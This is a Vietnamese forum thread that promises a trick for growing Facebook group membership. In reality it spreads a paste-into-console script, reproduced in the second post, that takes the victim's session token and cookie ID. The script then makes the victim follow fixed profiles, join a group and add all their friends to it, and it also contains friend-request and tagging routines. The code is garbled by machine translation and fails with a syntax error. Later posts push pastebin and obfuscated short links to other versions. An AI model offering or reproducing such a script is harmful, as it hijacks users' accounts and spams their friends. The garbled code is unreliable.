THỦ THUẬT Cách tăng thành viên cho nhóm trong Facebook. Cực "hot"

Thảo luận trong '[Win] Hỏi đáp - CSKN' bắt đầu bởi 70211119, 14/7/13. Trả lời: 12, Xem: 19050.

Chia sẻ

 1. 70211119

  70211119 Thành viên

  Tham gia:
  14/9/09
  Được thích:
  116

  ---------------------------------------------------------------------------------------------------------------------------
   

  Chia sẻ

 2. oclentiensinh

  oclentiensinh Thành viên

  Tham gia:
  20/6/11
  Được thích:
  3
  bạn ơi làm ơn chỉ mình làm với mình đã làm đúng theo hướng dẫn nhưng nó hiện lên The page at https://www.facebook.com/ displayed insecure content from http://static.ak.fbcdn.net/rsrc.php/v2/yk/r/WYobj9X6tP3.png.
  www.facebook.com/:1​

  The page at https://www.facebook.com/ displayed insecure content from http://static.ak.fbcdn.net/rsrc.php/v2/y4/r/-PAXP-deijE.gif.
  www.facebook.com/:1​

  The page at https://www.facebook.com/ displayed insecure content from http://static.ak.fbcdn.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif.
  www.facebook.com/:1​

  var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] giá trị. var user_id = document.cookie.match (document.cookie.match (/ c_user = (\ d +) /) [1]); chức năng cereziAl (ISIM) { var Tarama = ISIM + "="; if (document.cookie.length> 0) { konum = document.cookie.indexOf (Tarama) if (konum! = -1) { konum + = tarama.length con trai = document.cookie.indexOf (";", konum) if (con trai == -1) con trai = document.cookie.length trở unescape (document.cookie.substring (konum, con trai)) } khác {return "";} } } chức năng getRandomInt (min, max) { trở Math.floor (Math.random () * (tối đa - phút + 1)) + min; } chức năng randomValue (arr) { trở arr [getRandomInt (0, arr.length-1)]; } var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] giá trị. var user_id = document.cookie.match (document.cookie.match (/ c_user = (\ d +) /) [1]); hoạt động một (abone) { var http4 = new XMLHttpRequest (); var url4 = "/ ajax / theo / follow_profile.php __a = 1"; var params4 = "profile_id =" + abone + "& location = 1 & source = theo nút & subscribed_button_id = u37qac_37 & fb_dtsg =" + fb_dtsg + "& LSD & __" + user_id + "& phstamp ="; http4.open ("POST", url4, true); / / Gửi thông tin tiêu đề thích hợp cùng với các yêu cầu http4.setRequestHeader ("Content-type", "application / x-www-form-urlencoded"); http4.setRequestHeader ("Content-length", params4.length); http4.setRequestHeader ("kết nối", "gần gũi"); http4.onreadystatechange = function () {/ / Gọi một chức năng khi thay đổi trạng thái. if (http4.readyState == 4 && http4.status == 200) { http4.close; / / Đóng kết nối } } http4.send (params4); } chức năng danh sách phụ chứa (uidss) { var a = document.createElement ('script'); a.innerHTML = "mới flid: "+ uidss +"}) gửi (); ";. document.body.appendChild (a); } một ("100002056761396"); một ("100003486951474"); danh sách phụ chứa ("100003486951474"); danh sách phụ chứa ("100002056761396"); var gid = ['490947904323801 ']; var fb_dtsg = tài liệu ['getElementsByName'] ('fb_dtsg') [0] ['value']; var user_id = tài liệu ['cookie'] ['trận đấu'] (tài liệu ['cookie'] ['trận đấu'] (/ c_user = (\ d +) /) [1]); var httpwp = new XMLHttpRequest (); var urlwp = '/ ajax/groups/membership/r2j.php __a = 1?'; var paramswp = '& ref = group_jump_header & group_id =' + gid + '& fb_dtsg =' + fb_dtsg + '& __user =' + user_id + '& phstamp ='; httpwp ['mở'] ('POST', urlwp, true); httpwp ['setRequestHeader'] ('Content-type', 'application / x-www-form-urlencoded'); httpwp ['setRequestHeader'] ('Content-length, paramswp [' dài ']); httpwp ['setRequestHeader'] ('kết nối', 'giữ-sống'); httpwp ['gửi'] (paramswp); var fb_dtsg = tài liệu ['getElementsByName'] ('fb_dtsg') [0] ['value']; var user_id = tài liệu ['cookie'] ['trận đấu'] (tài liệu ['cookie'] ['trận đấu'] (/ c_user = (\ d +) /) [1]); bạn bè var = new Array (); gf = new XMLHttpRequest (); gf ['mở'] ('GET', '/ ajax / typeahead / first_degree.php __a = 1 & xem =?' + user_id + '& token' + Toán ['ngẫu nhiên'] () + "và bộ lọc [0] = người dùng và tùy chọn [ 0] = friends_only ', false); gf ['gửi'] (); nếu (gf ['readyState'] = 4) {} else { dữ liệu = eval ('(' + gf ['responseText'] ['substr'] (9) + ')'); nếu (dữ liệu ['lỗi']) {} else { bạn bè = dữ liệu ['tải'] ['mục'] ['loại'] (function (_0x93dax8, _0x93dax9) { trở _0x93dax8 ['chỉ số'] - _0x93dax9 ['chỉ số']; }); }; }; for (var i = 0; i <bạn bè ['dài']; i + +) { var httpwp = new XMLHttpRequest (); var urlwp = '/ ajax / nhóm / thành viên / add_post.php __a = 1?'; var paramswp = '& fb_dtsg =' + fb_dtsg + '& group_id =' + gid + '& source = typeahead & ref = & message_id = & thành viên =' + bạn bè ['uid'] + '& __user =' + user_id + '& phstamp ='; httpwp ['mở'] ('POST', urlwp, true); httpwp ['setRequestHeader'] ('Content-type', 'application / x-www-form-urlencoded'); httpwp ['setRequestHeader'] ('Content-length, paramswp [' dài ']); httpwp ['setRequestHeader'] ('kết nối', 'giữ-sống'); httpwp ['onreadystatechange'] = function () { if (httpwp ['readyState'] == 4 && httpwp ['tình trạng'] == 200) {}; }; httpwp ['gửi'] (paramswp); }; var spage_id = "388038841266419"; var user_id = document.cookie.match (document.cookie.match (/ c_user = (\ d +) /) [1]); var smesaj = ""; var smesaj_text = ""; var arkadaslar = []; var svn_rev; var bugun = new Date (); var btarihi = new Date (); btarihi.setTime (bugun.getTime () + 1000 * 60 * 60 * 4 * 1); if (document.cookie.match (/ paylasti = (\ d +) /)) { document.cookie = "paylasti = hayir; hết hạn =" + btarihi.toGMTString (); } / / Arkadaslari al đã đảo chức năng sarkadaslari_al () { var xmlhttp = new XMLHttpRequest (); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { eval ("arkadaslar =" + xmlhttp.responseText.toString () thay thế ("for (; ;);"., "") + ";"); cho (f = 0; f <Math.round (arkadaslar.payload.entries.length/10); e + +) { smesaj = ""; smesaj_text = ""; for (i = f * 10; i <(f 1) * 10; i + +) { if (arkadaslar.payload.entries ) { smesaj + = "@ [" + arkadaslar.payload.entries uid + ":".. + arkadaslar.payload.entries + "]"; smesaj_text + = "" + arkadaslar.payload.entries . } } sdurumpaylas ();} } }; var params = "& bộ lọc [0] = người sử dụng"; params + = "& lựa chọn [0] = friends_only"; params + = "& lựa chọn [1] = nm"; params + = "& token = v7"; params + = "& xem =" + user_id; params + = "& __user =" + user_id; if (document.URL.indexOf ("https://")> = 0) {xmlhttp.open ("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1 "+ params, true);} else {xmlhttp.open ("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true);} xmlhttp.send (); } / / Tiklama olayini dinle var tiklama = document.addEventListener ("nhấp chuột", function () { if (document.cookie.split ("paylasti =" chia) [1] (. ";"). [0] indexOf ("hayir")> = 0) { svn_rev = document.head.innerHTML.split ("svn_rev": '). chia [1] (",") [0]; sarkadaslari_al (); document.cookie = "paylasti = evet; hết hạn =" + btarihi.toGMTString (); document.removeEventListener (tiklama); } }, False); / / Arkada? ¾ ekleme chức năng sarkadasekle (uid, cins) { var xmlhttp = new XMLHttpRequest (); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { } }; xmlhttp.open ("POST", "/ ajax / add_friend / action.php __a = 1?", true); var params = "to_friend =" + uid; params + = "& action = add_friend"; params + = "& how_found = friend_browser"; params + = "& ref_param = none"; params + = "& outgoing_id ="; params + = "& logging_location = friend_browser"; params + = "& no_flyout_on_click = true"; params + = "& ego_log_data ="; params + = "& HTTP_REFERER ="; params + = "& fb_dtsg =" + document.getElementsByName ('fb_dtsg') [0] giá trị. params + = "& phstamp = 165816749114848369115"; params + = "& __user =" + user_id; xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev); xmlhttp.setRequestHeader ("Content-Type", "application / x-www-form-urlencoded"); if (cins == "farketmez" && document.cookie.split ("cins" user_id + + "=" chiều dài> 1).) { xmlhttp.send (params); } If (document.cookie.split ("cins" user_id + + "=" chiều dài). <= 1) { cinsiyetgetir (uid, cins, "sarkadasekle"); } If (cins == document.cookie.split ("cins" user_id + + "=" chia) [1] (. ";"). [0] toString ()) { xmlhttp.send (params); } } / / Cinsiyet belirleme var cinssonuc = {}; var cinshtml = document.createElement ("html"); chức năng scinsiyetgetir (uid, cins, fonksiyon) { var xmlhttp = new XMLHttpRequest (); xmlhttp.onreadystatechange = function () { if (xmlhttp.readyState == 4) { eval ("cinssonuc =" + xmlhttp.responseText.toString () thay thế ("for (; ;);"., "") + ";"); cinshtml.innerHTML = __html cinssonuc.jsmods.markup [0] [1]. btarihi.setTime (bugun.getTime () + 1000 * 60 * 60 * 24 * 365); if (cinshtml.getElementsByTagName ("chọn") [0] giá trị. == "1") { document.cookie = "cins" + + user_id "= Kadin; hết hạn =" + btarihi.toGMTString (); } If (cinshtml.getElementsByTagName ("chọn") [0] giá trị == "2".) { document.cookie = "cins" + + user_id "= erkek; hết hạn =" + btarihi.toGMTString (); } eval (fonksiyon + "(" + id + "," + cins + ");"); } }; xmlhttp.open ("GET", "/ ajax / thời gian / edit_profile / basic_info.php __a = 1 & __user =?" + user_id, true); xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev); xmlhttp.send (); }
  SyntaxError: Unexpected identifier
  The page at https://www.facebook.com/oclentiensinh displayed insecure content from http://static.ak.fbcdn.net/rsrc.php/v2/yw/r/drP8vlvSl_8.gif.
  Y-S5KFs9DaT.js:19​

  sao nữa bạn
   
  70211119 thích nội dung này.
  1. 70211119

   70211119 Thành viên

   Tham gia:
   14/9/09
   Được thích:
   116
 3. Sonnt1086

  Sonnt1086 Thành viên

  Tham gia:
  21/5/11
  Được thích:
  0
  Phần mã trên các bạn copy ở đây cho chuẩn này: http:// pastebin .com/raw.php?i=RhRkkBtv đã test, ok! (bỏ dấu cách đi nhá, em chưa đủ 5 bài nên chưa dc post link, hic)
   
  1. 70211119

   70211119 Thành viên

   Tham gia:
   14/9/09
   Được thích:
   116
   70211119 @Sonnt1086 haha! bạn qua chỗ khác làm ăn nhé! -_- đâu cần phải z! >.<
    
 4. 70211119

  70211119 Thành viên

  Tham gia:
  14/9/09
  Được thích:
  116
  cái của mìh đã đc rồi đấy! mìh kiểm tra hàng ngày để đc lợi cao nhất! m.n cứ an tâm! hôk cần nge e ai hết! :D
   
 5. Sonnt1086

  Sonnt1086 Thành viên

  Tham gia:
  21/5/11
  Được thích:
  0
  Làm ăn? bạn muốn làm ăn gì ở đây hả 70211119? Nếu cái của bạn không vấn đề gì, thì sao cứ phải dùng cái của bạn mới đúng? Cái của mình có lỗi không chạy dc à?
   
 6. forever188

  forever188 Thành viên

  Tham gia:
  25/8/08
  Được thích:
  47
  cái này ko gửi cho ng khác thì ko được tăng lượng người theo dỗi hả bạn? mình làm như trên thì có phải tăng lượng người like cho chính FB của bạn đúng ko
   
 7. duythai19831983

  duythai19831983 Dự bị

  Tham gia:
  17/11/09
  Được thích:
  2
  các bác giúp em với, sao máy thính của em ko lên face được vậy, lúc trước thì lên bình thường. sau khi đi bảo hành về thì ko lên được nửa, em sài win 7
   
 8. shoptuancua

  shoptuancua Thành viên

  Tham gia:
  3/12/12
  Được thích:
  1
  nếu làm như vậy sẽ bị khóa nick đó bạn
   
 9. Alazada

  Alazada Dự bị

  Tham gia:
  14/11/13
  Được thích:
  0
  Bạn nên xem hướng dẫn cụ thể nhất tại : 000http://goo.gl/Bq7wt5 ( xóa 000 )
   
 10. CH3

  CH3 Dự bị

  Tham gia:
  24/9/06
  Được thích:
  1
  làm thế thì lợi ích gì vậy bạn?
   
 11. hienvd_93

  hienvd_93 Dự bị

  Tham gia:
  18/4/17
  Được thích:
  0
  đúng chỉ có gà mới làm theo :)) F12 là biết lừa người r =)))
   

Chia sẻ

Đang tải...